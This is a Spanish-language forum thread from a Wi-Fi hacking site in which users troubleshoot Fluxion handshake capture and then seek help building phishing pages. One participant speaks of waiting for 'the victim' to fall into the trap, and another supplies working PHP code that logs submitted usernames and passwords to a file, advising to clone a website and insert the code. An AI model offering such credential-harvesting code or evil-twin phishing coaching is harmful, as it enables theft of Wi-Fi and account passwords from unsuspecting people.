El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 28-11-2017 17:39:07

iTroNk
Usuario

Registrado: 16-11-2017
Mensajes: 9

Usando Fluxion Problemas.

Estoy usando fluxion haciendo pruebas de seguridad.

Resulta que tengo un router comtred el negrito de jazztel y otro de orange un livebox pues bien con el de jazztel me pilla el handsnake y con el de orange no, cuando los dos reciben las misma datas por que puede ser el problema??

Se puede meter en fluxion un handsnake capturado con otro programa, me dice que esta corrupto con el de orange.

Debo esperar un determinado de datas o algo

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 28-11-2017 20:37:10

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

te dice que esta corrupto cual programa? porque fluxion usa pyrit y aircrack. y que versión estas usando de fluxion? se mas especifico

Desconectado

#3 29-11-2017 21:54:05

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,476

Re: Usando Fluxion Problemas.

Se puede meter en fluxion un handsnake capturado con otro programa,

Supongo que cuela. Encuentra dónde fluxion guarda los handshakes y pegar ahí el handshake que has obtenido.
Supongo que tiene un directorio dedicado propio
Con

locate *.cap

 
Verás dónde se encuentran tus ficheros de capturas y lo encontrarás.
Ya nos comentarás algo.
¡Bienvenido a wifi-libre! smile

Desconectado

#4 30-11-2017 11:07:48

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

si usas la ultima versión de fluxión que es la 3.4 es aquí

fluxion-3.4/attacks/Handshake Snooper/handshakes/

en las otras versiones creo que era en /tmp/

Desconectado

#5 30-11-2017 13:20:43

iTroNk
Usuario

Registrado: 16-11-2017
Mensajes: 9

Re: Usando Fluxion Problemas.

crash escribió:

si usas la ultima versión de fluxión que es la 3.4 es aquí

fluxion-3.4/attacks/Handshake Snooper/handshakes/

en las otras versiones creo que era en /tmp/

Correcto he conseguido el handshake, ahora a ver si la victima entra en la trampa o no.

Desconectado

#6 30-11-2017 15:54:39

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

ok, me alegro que lo hayas logrado.

Desconectado

#7 14-05-2018 11:44:07

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

buenas ¿ nunca me ha pasado pero tengo un problema con fluxion resulta que todo va bien pero cuando va a sacar el handshake pone fixed channel wlan0mon y va cambiando canales? No se por que la verdad nunca me ha habia pasado la distro es kali linux 2018.2 vajo virtual box y el chipset es un ralink 3070 y la vercion del fluxion es 4.10 saludos y gracias espero no quibocarme de foro jeje

Desconectado

#8 14-05-2018 14:15:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,476

Re: Usando Fluxion Problemas.

Lo que puedes hacer es conseguir el handshake por otro lado y lo colocas en la carpeta

fluxion-3.4/attacks/Handshake Snooper/handshakes/

(ver respuesta anterior de crash)

Desconectado

#9 14-05-2018 16:10:21

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

perfecto no habia caido en eso si es buena alternativa gracias señor smile a ver si viene koala jeje menuda herramienta se lo curro el caballero saludos

Desconectado

#10 15-05-2018 09:44:53

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,476

Re: Usando Fluxion Problemas.

Koala está de rule para un tiempo; volverá cuando habrá acabado su reserva de porros de eucalipto.  big_smile

Desconectado

#11 15-05-2018 18:46:58

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

jajajajajaja xD
buenas kcdtv te llego un correo por casualidad saludos

Desconectado

#12 16-05-2018 15:44:33

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,476

Re: Usando Fluxion Problemas.

No atiendo por mail al no ser que tengas un problema para acceder a tu cuenta o historias del palo. Si tienes una idea o un problema para realizar una idea la cosa es hablar de ello en el foro. smile

Desconectado

#13 16-05-2018 17:02:36

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

ok  caballero es que no se donde postear el tema lo posteare aqui ejeje. resulta que pude hacer un phising https bajo windows  este finde de semana probare en linux que seguro que funcionara igual o mejor la cosa aqui viene se que linset tiene muy buenas plantillas para hacer phising el rpoblema que vale se coje el logins de la web pero genera un check.php lo que trato de hacer es que haga como la web de koala sus plantillas los guarda en un txt o sea la cosa seria asi modificar plantillas para hacer un mejor ataque y con soporte https smile lo que no se es como modficar las plantillas para que guarden la clave en un txt saludos caballero

Desconectado

#14 16-05-2018 17:40:15

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

https://www.wifi-libre.com/topic-203-mo … html#p8105
aqui tienes una plantilla que hice yo en php.
la línea que dice

$f = fopen("contraseña.html", "a"); 

sirve para que te cree el archivo en html, podiendolo cambiar a txt

$f = fopen("contraseña.txt", "a"); 

Desconectado

#15 16-05-2018 17:46:25

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

ostias que bueno colega  smile a ver si logro entenderlo la cosa es por ejemplo clonar la web y despues insertar el codigo php que grava la contraseña en un txt verdad

Desconectado

#16 16-05-2018 17:55:30

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

cdt escribió:

ostias que bueno colega  smile a ver si logro entenderlo la cosa es por ejemplo clonar la web y despues insertar el codigo php que grava la contraseña en un txt verdad

<?php
 if($_POST){
$usuario = $_POST['user'];
$pass = $_POST['pass'];
$f = fopen("contraseña.html", "a"); 
fwrite ($f, '<font color="black">Red:[</font><b><font color="red">'.$usuario.'</font></b><font color="black">]Password: [</font><b><font color="red">'.$pass.'</font></b><font color="black">]</font><br>');
fclose($f);
}
?>

esto es lo que necesitas realmente para lo que quieres hacer, crea una página de prueba añades el código y ves lo que te hace y segun te haga, lo modificas a tu gusto.

Desconectado

#17 16-05-2018 17:57:20

cdt
Usuario

Registrado: 10-05-2018
Mensajes: 19

Re: Usando Fluxion Problemas.

oiga pues perfecto jeje wink

Desconectado

#18 16-05-2018 18:02:54

crash
Expulsado

Registrado: 25-10-2017
Mensajes: 1,049

Re: Usando Fluxion Problemas.

para cualquier otra duda que te pueda salir con el php, abre un nuevo hilo.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
2 193 Hoy 03:20:43 por manturis
2 142 Ayer 12:11:10 por kcdtv
3 184 Ayer 11:40:47 por kcdtv
Movido:: Ejecutar HashCat en GoogleCloud por alexupps
     
1 134 14-10-2018 21:23:30 por josep345

Pie de página

Información del usuario

Ultimo usuario registrado: ki.llUsser101
Usuarios registrados conectados: 0
Invitados conectados: 10

Estadisticas de los foros

Número total de usuarios registrados: 1,231
Número total de temas: 1,204
Número total de mensajes: 12,409

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21